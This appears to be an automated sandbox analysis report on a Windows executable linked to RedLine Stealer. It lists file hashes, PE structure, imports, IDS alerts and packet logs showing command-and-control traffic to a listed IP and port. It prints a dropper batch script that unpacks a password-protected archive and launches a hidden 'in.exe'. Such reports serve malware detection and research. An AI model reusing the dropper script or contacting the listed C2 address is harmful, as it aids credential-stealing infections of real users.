Entropy (8bit):	5.059136584355333
Encrypted:	false
SSDEEP:	12:QUp+CF16g64CTFMj2LIQLvcQW+CVGrMLvmuCogLKO8NerxVv:QUpNF16g632Cke5W+CVGYTOLv8k7
MD5:	0CF3F0045A205024F27D5FA77133721A
SHA1:	4EE588B176338AD2B98C69FDB8CE69E8E1D3A8F7
SHA-256:	246FF46EC2663A262A37B80769C7E67037A730CF8E7B9065FABAD54EE957CE96
SHA-512:	2C957F678EA006D29828D4F2704D19A2EEC5A0B5F23855632917F4ABE39D67B29566586688E8B6447DF548F0BDAF828E84BB9895C907276AD78E0EEB812D65F6
Malicious:	false
Preview:	..&cls..@echo off..mode 65,10..title g3g34g34g34g43 (34g34g45h6hj56j56j)..md extracted..ren file.bin file.zip..call 7z.exe e file.zip -p324051139125346723019431074 -oextracted ..for /l %%i in (4,-1,1) do (..call 7z.exe e extracted/file_%%i.zip -oextracted..)..ren file.zip file.bin..cd extracted..move "in.exe" ../..cd....rd /s /q extracted..attrib +H "in.exe"..start "" "in.exe"..cls..echo Launched 'in.exe'...pause..del /f /q "in.exe"..

C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2246122658-3693405117-2476756634-1003\76b53b3ec448f7ccdda2063b15d2bfc3_9e146be9-c76a-4720-bcdb-53011b87bd06

Process:	C:\Users\user\AppData\Local\Temp\main\in.exe
File Type:	data
Category:	dropped
Size (bytes):	2251
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	0158FE9CEAD91D1B027B795984737614
SHA1:	B41A11F909A7BDF1115088790A5680AC4E23031B
SHA-256:	513257326E783A862909A2A0F0941D6FF899C403E104FBD1DBC10443C41D9F9A
SHA-512:	C48A55CC7A92CEFCEFE5FB2382CCD8EF651FC8E0885E88A256CD2F5D83B824B7D910F755180B29ECCB54D9361D6AF82F9CC741BD7E6752122949B657DA973676
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

\Device\ConDrv

Process:	C:\Users\user\AppData\Local\Temp\main\7z.exe
File Type:	ASCII text, with CRLF, CR line terminators
Category:	dropped
Size (bytes):	345
Entropy (8bit):	5.042296293911112
Encrypted:	false
SSDEEP:	6:AMMyS3pt+uoQcAxXF2SaioB1h3DVSTgqF1AivwtHgNxQFfpap1tNTQbdv:pMpDh5RwXzh3DoTgqFyYwMQJA1tNTQZv
MD5:	4FEC417468B84FB3281DE855B785F7FC
SHA1:	F5B0B89427DD68540071719DB993E80BCAD2C5AB
SHA-256:	00B70526BA4DF5A40CF8EF0CDD756534B6359684761D22D486D129D69DC1AEF5
SHA-512:	89277FF743E35F8E07F4539A2D48ABFF45D69E310ED25683C726EACD6266AA013DBA74407EF5955AB39EE6EC01EEE43385941564928C097DE38524DC94AAB4C3
Malicious:	false
Preview:	..7-Zip 19.00 (x64) : Copyright (c) 1999-2018 Igor Pavlov : 2019-02-21....Scanning the drive for archives:.. 0M Scan. .1 file, 609442 bytes (596 KiB)....Extracting archive: extracted\file_1.zip..--..Path = extracted\file_1.zip..Type = zip..Physical Size = 609442.... 0%. .Everything is Ok....Size: 912896..Compressed: 609442..

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.99111373611351
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	jjjUC5ggb2nQMb1B6SvBkwmT.exe
File size:	3'221'440 bytes
MD5:	9795b9f24e9a98ae78f7cad809ed1e2a
SHA1:	d92325ce71ae6bd9af9b74b1cc67f81dbb033020
SHA256:	a36a4fce0902ebb99f0a8441b024a03c2f1cd66063c59391257f0f96ea9ee5fb
SHA512:	ba6245246a94352757930ae6bac791ab2131f628e6c825451f99f049f5fae66eba2b8ddc24e33758fb4c4389b961d5669cd9e794eb3f2482dd658c0c0e8ee813
SSDEEP:	98304:K1545JlGEN7XGUCeDFQW+9KcylF94vOoPqK75S+pXz:K1W53HCeDFw6cvOVK75TD
TLSH:	CDE533B17BFE68B0F41521BBA888733C12F9FE894B91D0CBD788294A6E446C5617D0D7
File Content Preview:	MZ`.....................@...................................`...........!..L.!Require Windows..$PE..L....?.O............................_.............@..................................b1..............................................0...N..........0.0..?.

File Icon


Icon Hash:	00828e8e8686b000

Static PE Info

General

Entrypoint:	0x41945f
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:
Time Stamp:	0x4FC33FCE [Mon May 28 09:05:18 2012 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f6baa5eaa8231d4fe8e922a2e6d240ea

Authenticode Signature

Signature Valid:	false
Signature Issuer:	CN=STATPLUS LE, E=STATPLUS LE, O=STATPLUS LE, L=STATPLUS LE, C=USA
Signature Validation Error:	A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
Error Number:	-2146762487
Not Before, Not After	09/07/2024 02:00:00 09/07/2026 02:00:00
Subject Chain	CN=STATPLUS LE, E=STATPLUS LE, O=STATPLUS LE, L=STATPLUS LE, C=USA
Version:	3
Thumbprint MD5:	F26C74479D5E065AB9ECB2449FFBD5F3
Thumbprint SHA-1:	4DEFC48DAFB6E191E010930C9716760AB84CBAE8
Thumbprint SHA-256:	F50FAB63239CFF0026021904C833DBDA89D3E6ECF876EED29E206851997437AE
Serial:	7049503CAA85048F

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
push FFFFFFFFh
push 0041C480h
push 004195F0h
mov eax, dword ptr fs:[00000000h]
push eax
mov dword ptr fs:[00000000h], esp
sub esp, 68h
push ebx
push esi
push edi
mov dword ptr [ebp-18h], esp
xor ebx, ebx
mov dword ptr [ebp-04h], ebx
push 00000002h
call dword ptr [0041A1E0h]
pop ecx
or dword ptr [00422DE4h], FFFFFFFFh
or dword ptr [00422DE8h], FFFFFFFFh
call dword ptr [0041A1E4h]
mov ecx, dword ptr [00420DCCh]
mov dword ptr [eax], ecx
call dword ptr [0041A1E8h]
mov ecx, dword ptr [00420DC8h]
mov dword ptr [eax], ecx
mov eax, dword ptr [0041A1ECh]
mov eax, dword ptr [eax]
mov dword ptr [00422DE0h], eax
call 00007F01247EAB42h
cmp dword ptr [0041E950h], ebx
jne 00007F01247EAA2Eh
push 004195E8h
call dword ptr [0041A1F0h]
pop ecx
call 00007F01247EAB14h
push 0041E070h
push 0041E06Ch
call 00007F01247EAAFFh
mov eax, dword ptr [00420DC4h]
mov dword ptr [ebp-6Ch], eax
lea eax, dword ptr [ebp-6Ch]
push eax
push dword ptr [00420DC0h]
lea eax, dword ptr [ebp-64h]
push eax
lea eax, dword ptr [ebp-70h]
push eax
lea eax, dword ptr [ebp-60h]
push eax
call dword ptr [0041A1F8h]
push 0041E068h
push 0041E000h
call 00007F01247EAACCh

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x1c984	0xc8	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x23000	0x4ed4	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x30e830	0x3f90
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x1a000	0x36c	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x18e0e	0x19000	24c0ee59c5c5acd38d95e55352758dd8	False	0.602919921875	data	6.656009688780664	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x1a000	0x3bda	0x3c00	d084871adc0cd9263e4a1811b8fc40fa	False	0.45553385416666664	data	5.725242374702596	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x1e000	0x4dec	0xa00	8c42b68006a121b1b9ebd199e2e59ca5	False	0.50546875	data	4.442014356812219	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x23000	0x4ed4	0x5000	6e7c2212fbc8ea0e907aa402632ee8bf	False	0.1	data	3.939503749750167	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0x231c0	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	Russian	Russia	0.0975177304964539
RT_ICON	0x23628	0x9b8	Device independent bitmap graphic, 24 x 48 x 32, image size 2448	Russian	Russia	0.10008038585209003
RT_ICON	0x23fe0	0x1128	Device independent bitmap graphic, 32 x 64 x 32, image size 4352	Russian	Russia	0.061930783242258654
RT_ICON	0x25108	0x2668	Device independent bitmap graphic, 48 x 96 x 32, image size 9792	Russian	Russia	0.04017493897477624
RT_GROUP_ICON	0x27770	0x3e	data	Russian	Russia	0.8387096774193549
RT_VERSION	0x277b0	0x3dc	data			0.46558704453441296
RT_MANIFEST	0x27b8c	0x346	ASCII text, with CRLF line terminators	English	United States	0.5071599045346062

Imports

DLL	Import
COMCTL32.dll
SHELL32.dll	SHGetSpecialFolderPathW, ShellExecuteW, SHGetMalloc, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, ShellExecuteExW
GDI32.dll	CreateCompatibleDC, CreateFontIndirectW, DeleteObject, DeleteDC, GetCurrentObject, StretchBlt, GetDeviceCaps, CreateCompatibleBitmap, SelectObject, SetStretchBltMode, GetObjectW
ADVAPI32.dll	FreeSid, AllocateAndInitializeSid, CheckTokenMembership
USER32.dll	GetWindowLongW, GetMenu, SetWindowPos, GetWindowDC, ReleaseDC, GetDlgItem, GetParent, GetWindowRect, GetClassNameA, CreateWindowExW, SetTimer, GetMessageW, DispatchMessageW, KillTimer, DestroyWindow, SendMessageW, EndDialog, wsprintfW, GetWindowTextW, GetWindowTextLengthW, GetSysColor, wsprintfA, SetWindowTextW, MessageBoxA, ScreenToClient, GetClientRect, SetWindowLongW, UnhookWindowsHookEx, SetFocus, GetSystemMetrics, SystemParametersInfoW, ShowWindow, DrawTextW, GetDC, ClientToScreen, GetWindow, DialogBoxIndirectParamW, DrawIconEx, CallWindowProcW, DefWindowProcW, CallNextHookEx, PtInRect, SetWindowsHookExW, LoadImageW, LoadIconW, MessageBeep, EnableWindow, IsWindow, EnableMenuItem, GetSystemMenu, CreateWindowExA, wvsprintfW, CharUpperW, GetKeyState, CopyImage
ole32.dll	CreateStreamOnHGlobal, CoCreateInstance, CoInitialize
OLEAUT32.dll	VariantClear, SysFreeString, OleLoadPicture, SysAllocString
KERNEL32.dll	GetFileSize, SetFilePointer, ReadFile, WaitForMultipleObjects, GetModuleHandleA, SetFileTime, SetEndOfFile, LeaveCriticalSection, EnterCriticalSection, DeleteCriticalSection, FormatMessageW, lstrcpyW, LocalFree, IsBadReadPtr, GetSystemDirectoryW, GetCurrentThreadId, SuspendThread, TerminateThread, InitializeCriticalSection, ResetEvent, SetEvent, CreateEventW, GetVersionExW, GetModuleFileNameW, GetCurrentProcess, SetProcessWorkingSetSize, SetCurrentDirectoryW, GetDriveTypeW, CreateFileW, GetCommandLineW, GetStartupInfoW, CreateProcessW, CreateJobObjectW, ResumeThread, AssignProcessToJobObject, CreateIoCompletionPort, SetInformationJobObject, GetQueuedCompletionStatus, GetExitCodeProcess, CloseHandle, SetEnvironmentVariableW, GetTempPathW, GetSystemTimeAsFileTime, lstrlenW, CompareFileTime, SetThreadLocale, FindFirstFileW, DeleteFileW, FindNextFileW, FindClose, RemoveDirectoryW, ExpandEnvironmentStringsW, WideCharToMultiByte, VirtualAlloc, GlobalMemoryStatusEx, lstrcmpW, GetEnvironmentVariableW, lstrcmpiW, lstrlenA, GetLocaleInfoW, MultiByteToWideChar, GetUserDefaultUILanguage, GetSystemDefaultUILanguage, GetSystemDefaultLCID, lstrcmpiA, GlobalAlloc, GlobalFree, MulDiv, FindResourceExA, SizeofResource, LoadResource, LockResource, LoadLibraryA, GetProcAddress, GetModuleHandleW, ExitProcess, lstrcatW, GetDiskFreeSpaceExW, SetFileAttributesW, SetLastError, Sleep, GetExitCodeThread, WaitForSingleObject, CreateThread, GetLastError, SystemTimeToFileTime, GetLocalTime, GetFileAttributesW, CreateDirectoryW, WriteFile, GetStdHandle, VirtualFree, GetStartupInfoA
MSVCRT.dll	??3@YAXPAX@Z, ??2@YAPAXI@Z, memcmp, free, memcpy, _wtol, _controlfp, _except_handler3, __set_app_type, __p__fmode, __p__commode, _adjust_fdiv, __setusermatherr, _initterm, __getmainargs, _acmdln, exit, _XcptFilter, _exit, ??1type_info@@UAE@XZ, _onexit, __dllonexit, _CxxThrowException, _beginthreadex, _EH_prolog, ?_set_new_handler@@YAP6AHI@ZP6AHI@Z@Z, memset, _wcsnicmp, strncmp, wcsncmp, malloc, memmove, _purecall

Possible Origin

Language of compilation system	Country where language is spoken	Map
Russian	Russia
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	Protocol	SID	Signature	Source Port	Dest Port	Source IP	Dest IP
2024-07-26T19:26:04.138395+0200	TCP	2043231	ET MALWARE Redline Stealer TCP CnC Activity	49706	5058	192.168.2.5	23.94.183.150
2024-07-26T19:26:06.203650+0200	TCP	2043231	ET MALWARE Redline Stealer TCP CnC Activity	49706	5058	192.168.2.5	23.94.183.150
2024-07-26T19:26:07.970977+0200	TCP	2043231	ET MALWARE Redline Stealer TCP CnC Activity	49706	5058	192.168.2.5	23.94.183.150
2024-07-26T19:26:03.883701+0200	TCP	2043231	ET MALWARE Redline Stealer TCP CnC Activity	49706	5058	192.168.2.5	23.94.183.150
2024-07-26T19:26:07.460720+0200	TCP	2043231	ET MALWARE Redline Stealer TCP CnC Activity	49706	5058	192.168.2.5	23.94.183.150
2024-07-26T19:26:07.587021+0200	TCP	2043231	ET MALWARE Redline Stealer TCP CnC Activity	49706	5058	192.168.2.5	23.94.183.150
2024-07-26T19:26:07.825893+0200	TCP	2043231	ET MALWARE Redline Stealer TCP CnC Activity	49706	5058	192.168.2.5	23.94.183.150
2024-07-26T19:26:05.217520+0200	TCP	2043231	ET MALWARE Redline Stealer TCP CnC Activity	49706	5058	192.168.2.5	23.94.183.150
2024-07-26T19:26:06.325866+0200	TCP	2043231	ET MALWARE Redline Stealer TCP CnC Activity	49706	5058	192.168.2.5	23.94.183.150
2024-07-26T19:26:05.095680+0200	TCP	2043231	ET MALWARE Redline Stealer TCP CnC Activity	49706	5058	192.168.2.5	23.94.183.150
2024-07-26T19:26:07.338019+0200	TCP	2043231	ET MALWARE Redline Stealer TCP CnC Activity	49706	5058	192.168.2.5	23.94.183.150
2024-07-26T19:26:05.550691+0200	TCP	2043231	ET MALWARE Redline Stealer TCP CnC Activity	49706	5058	192.168.2.5	23.94.183.150
2024-07-26T19:26:04.344095+0200	TCP	2043231	ET MALWARE Redline Stealer TCP CnC Activity	49706	5058	192.168.2.5	23.94.183.150
2024-07-26T19:26:06.792190+0200	TCP	2043231	ET MALWARE Redline Stealer TCP CnC Activity	49706	5058	192.168.2.5	23.94.183.150
2024-07-26T19:25:58.453702+0200	TCP	2046045	ET MALWARE [ANY.RUN] RedLine Stealer/MetaStealer Family Related (MC-NMF Authorization)	49706	5058	192.168.2.5	23.94.183.150
2024-07-26T19:26:04.968474+0200	TCP	2043231	ET MALWARE Redline Stealer TCP CnC Activity	49706	5058	192.168.2.5	23.94.183.150
2024-07-26T19:26:05.420008+0200	TCP	2043231	ET MALWARE Redline Stealer TCP CnC Activity	49706	5058	192.168.2.5	23.94.183.150
2024-07-26T19:26:05.710903+0200	TCP	2043231	ET MALWARE Redline Stealer TCP CnC Activity	49706	5058	192.168.2.5	23.94.183.150
2024-07-26T19:26:04.350286+0200	TCP	2043231	ET MALWARE Redline Stealer TCP CnC Activity	49706	5058	192.168.2.5	23.94.183.150
2024-07-26T19:25:58.572801+0200	TCP	2043234	ET MALWARE Redline Stealer TCP CnC - Id1Response	5058	49706	23.94.183.150	192.168.2.5
2024-07-26T19:26:03.753284+0200	TCP	2046056	ET MALWARE Redline Stealer/MetaStealer Family Activity (Response)	5058	49706	23.94.183.150	192.168.2.5
2024-07-26T19:26:04.010813+0200	TCP	2043231	ET MALWARE Redline Stealer TCP CnC Activity	49706	5058	192.168.2.5	23.94.183.150
2024-07-26T19:26:50.503417+0200	TCP	2022930	ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow	443	49714	40.68.123.157	192.168.2.5
2024-07-26T19:26:06.446924+0200	TCP	2043231	ET MALWARE Redline Stealer TCP CnC Activity	49706	5058	192.168.2.5	23.94.183.150
2024-07-26T19:26:05.878741+0200	TCP	2043231	ET MALWARE Redline Stealer TCP CnC Activity	49706	5058	192.168.2.5	23.94.183.150
2024-07-26T19:26:06.616210+0200	TCP	2043231	ET MALWARE Redline Stealer TCP CnC Activity	49706	5058	192.168.2.5	23.94.183.150
2024-07-26T19:26:03.624089+0200	TCP	2043231	ET MALWARE Redline Stealer TCP CnC Activity	49706	5058	192.168.2.5	23.94.183.150
2024-07-26T19:26:07.706698+0200	TCP	2043231	ET MALWARE Redline Stealer TCP CnC Activity	49706	5058	192.168.2.5	23.94.183.150
2024-07-26T19:26:12.288163+0200	TCP	2022930	ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow	443	49707	40.68.123.157	192.168.2.5

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 26, 2024 19:25:57.898174047 CEST	49706	5058	192.168.2.5	23.94.183.150
Jul 26, 2024 19:25:57.903064966 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:25:57.903136015 CEST	49706	5058	192.168.2.5	23.94.183.150
Jul 26, 2024 19:25:57.947212934 CEST	49706	5058	192.168.2.5	23.94.183.150
Jul 26, 2024 19:25:57.952023029 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:25:58.418492079 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:25:58.453701973 CEST	49706	5058	192.168.2.5	23.94.183.150
Jul 26, 2024 19:25:58.458728075 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:25:58.572801113 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:25:58.620345116 CEST	49706	5058	192.168.2.5	23.94.183.150
Jul 26, 2024 19:26:03.624089003 CEST	49706	5058	192.168.2.5	23.94.183.150
Jul 26, 2024 19:26:03.629199028 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:03.750307083 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:03.750354052 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:03.750389099 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:03.750420094 CEST	49706	5058	192.168.2.5	23.94.183.150
Jul 26, 2024 19:26:03.753283978 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:03.753381014 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:03.753515959 CEST	49706	5058	192.168.2.5	23.94.183.150
Jul 26, 2024 19:26:03.883701086 CEST	49706	5058	192.168.2.5	23.94.183.150
Jul 26, 2024 19:26:03.889085054 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.003895998 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.010812998 CEST	49706	5058	192.168.2.5	23.94.183.150
Jul 26, 2024 19:26:04.016259909 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.129604101 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.138395071 CEST	49706	5058	192.168.2.5	23.94.183.150
Jul 26, 2024 19:26:04.143798113 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.143806934 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.143810034 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.143816948 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.143929005 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.143937111 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.143944025 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.144360065 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.270029068 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.323659897 CEST	49706	5058	192.168.2.5	23.94.183.150
Jul 26, 2024 19:26:04.344094992 CEST	49706	5058	192.168.2.5	23.94.183.150
Jul 26, 2024 19:26:04.350091934 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.350128889 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.350155115 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.350181103 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.350286007 CEST	49706	5058	192.168.2.5	23.94.183.150
Jul 26, 2024 19:26:04.350709915 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.350748062 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.350799084 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.350915909 CEST	49706	5058	192.168.2.5	23.94.183.150
Jul 26, 2024 19:26:04.351021051 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.351114988 CEST	49706	5058	192.168.2.5	23.94.183.150
Jul 26, 2024 19:26:04.355232000 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.355334044 CEST	49706	5058	192.168.2.5	23.94.183.150
Jul 26, 2024 19:26:04.355792046 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.355859041 CEST	49706	5058	192.168.2.5	23.94.183.150
Jul 26, 2024 19:26:04.356007099 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.356081009 CEST	49706	5058	192.168.2.5	23.94.183.150
Jul 26, 2024 19:26:04.356605053 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.356632948 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.356671095 CEST	49706	5058	192.168.2.5	23.94.183.150
Jul 26, 2024 19:26:04.356714010 CEST	49706	5058	192.168.2.5	23.94.183.150
Jul 26, 2024 19:26:04.356791019 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.356842995 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.356870890 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.356893063 CEST	49706	5058	192.168.2.5	23.94.183.150
Jul 26, 2024 19:26:04.356918097 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.356944084 CEST	49706	5058	192.168.2.5	23.94.183.150
Jul 26, 2024 19:26:04.356961966 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.356987953 CEST	49706	5058	192.168.2.5	23.94.183.150
Jul 26, 2024 19:26:04.356990099 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.357012033 CEST	49706	5058	192.168.2.5	23.94.183.150
Jul 26, 2024 19:26:04.357019901 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.357048035 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.357048035 CEST	49706	5058	192.168.2.5	23.94.183.150
Jul 26, 2024 19:26:04.357070923 CEST	49706	5058	192.168.2.5	23.94.183.150
Jul 26, 2024 19:26:04.357095003 CEST	49706	5058	192.168.2.5	23.94.183.150
Jul 26, 2024 19:26:04.357129097 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.357189894 CEST	49706	5058	192.168.2.5	23.94.183.150
Jul 26, 2024 19:26:04.357247114 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.357274055 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.357297897 CEST	49706	5058	192.168.2.5	23.94.183.150
Jul 26, 2024 19:26:04.357322931 CEST	49706	5058	192.168.2.5	23.94.183.150
Jul 26, 2024 19:26:04.357371092 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.357429981 CEST	49706	5058	192.168.2.5	23.94.183.150
Jul 26, 2024 19:26:04.360292912 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.360410929 CEST	49706	5058	192.168.2.5	23.94.183.150
Jul 26, 2024 19:26:04.361238956 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.361310959 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.361337900 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.361365080 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.361481905 CEST	49706	5058	192.168.2.5	23.94.183.150
Jul 26, 2024 19:26:04.361599922 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.361656904 CEST	49706	5058	192.168.2.5	23.94.183.150
Jul 26, 2024 19:26:04.362086058 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.362133026 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.362159014 CEST	49706	5058	192.168.2.5	23.94.183.150
Jul 26, 2024 19:26:04.362184048 CEST	49706	5058	192.168.2.5	23.94.183.150
Jul 26, 2024 19:26:04.362190008 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.362236023 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.362248898 CEST	49706	5058	192.168.2.5	23.94.183.150
Jul 26, 2024 19:26:04.362262964 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.362289906 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.362293959 CEST	49706	5058	192.168.2.5	23.94.183.150
Jul 26, 2024 19:26:04.362317085 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.362335920 CEST	49706	5058	192.168.2.5	23.94.183.150
Jul 26, 2024 19:26:04.362366915 CEST	49706	5058	192.168.2.5	23.94.183.150
Jul 26, 2024 19:26:04.362649918 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.362708092 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.362711906 CEST	49706	5058	192.168.2.5	23.94.183.150
Jul 26, 2024 19:26:04.362756014 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.362763882 CEST	49706	5058	192.168.2.5	23.94.183.150
Jul 26, 2024 19:26:04.362792015 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.362814903 CEST	49706	5058	192.168.2.5	23.94.183.150
Jul 26, 2024 19:26:04.362838030 CEST	49706	5058	192.168.2.5	23.94.183.150
Jul 26, 2024 19:26:04.362867117 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.362893105 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.362929106 CEST	49706	5058	192.168.2.5	23.94.183.150
Jul 26, 2024 19:26:04.362956047 CEST	49706	5058	192.168.2.5	23.94.183.150
Jul 26, 2024 19:26:04.362961054 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.363004923 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.363035917 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.363039017 CEST	49706	5058	192.168.2.5	23.94.183.150
Jul 26, 2024 19:26:04.363063097 CEST	5058	49706	23.94.183.150	192.168.2.5
